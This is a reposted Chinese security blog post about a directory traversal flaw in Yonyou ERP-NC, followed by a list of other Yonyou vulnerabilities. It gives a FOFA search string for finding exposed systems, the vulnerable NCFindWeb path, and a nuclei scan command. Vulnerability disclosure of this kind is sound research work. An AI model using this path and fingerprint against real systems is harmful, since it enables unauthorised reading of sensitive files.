用友ERP-NC 存在目录遍历漏洞 nuclei

admin
admin
admin
102239
文章
87
评论
2022年9月26日09:01:24评论202 views字数 864阅读2分52秒阅读模式
用友ERP-NC 存在目录遍历漏洞 nuclei
文章声明

安全文章技术仅供参考,此文所提供的信息为漏洞靶场进行渗透,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。
本文所提供的工具仅用于学习,禁止用于其他,未经授权,严禁转载,如需转载私信联系。



用友ERP-NC 存在目录遍历漏洞 nuclei


漏洞简介

用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息。



漏洞影响


用友ERP-NC
fofa:
    app="用友-UFIDA-NC"


漏洞复现


存在漏洞的地址

/NCFindWeb?service=IPreAlertConfigService&filename=

用友ERP-NC 存在目录遍历漏洞 nuclei




nuclei-pocs

nuclei -t yonyou_nc_NCFindweb_read_file.yaml -l url.txt

公众号回复0925获取

用友ERP-NC 存在目录遍历漏洞 nuclei




用友漏洞待更新记录

  • 用友 U8 OA test.jsp SQL注入漏洞

  • 用友nc v6.5 远程命令执行漏洞(CNVD-2021-30167

  • 用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞

  • 用友 畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞

  • 用友 畅捷通T+ Upload.aspx 任意文件上传漏洞

  • 用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞

  • 用友 NC NCFindWeb 任意文件读取漏洞

  • 用友 NCCloud FS文件管理SQL注入

  • 用友 NC bsh.servlet.BshServlet 远程命令执行漏洞

  • 用友 GRP-U8 Proxy SQL注入 CNNVD-201610-923

  • 用友 FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞

  • 用友 ERP-NC NCFindWeb 目录遍历漏洞

  • 用友nc v6.5 反序列化漏洞 补丁绕过

  • 用友nc v6.5 反序列化漏洞

  • 用友nc v6.5 反射型xss

  • 用友nc v6.5 前台任意文件上传漏洞

  • (CNVD-2021-37786)用友nc Cloud FS 文件管理系统 任意账户登录漏洞

  • 用友 GRP-u8 前台存在任意文件上传漏洞

  • 用友nc IUFO v5




原文始发于微信公众号(北极星sec):用友ERP-NC 存在目录遍历漏洞 nuclei

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年9月26日09:01:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   用友ERP-NC 存在目录遍历漏洞 nucleihttp://cn-sec.com/archives/1315410.html

发表评论

匿名网友 填写信息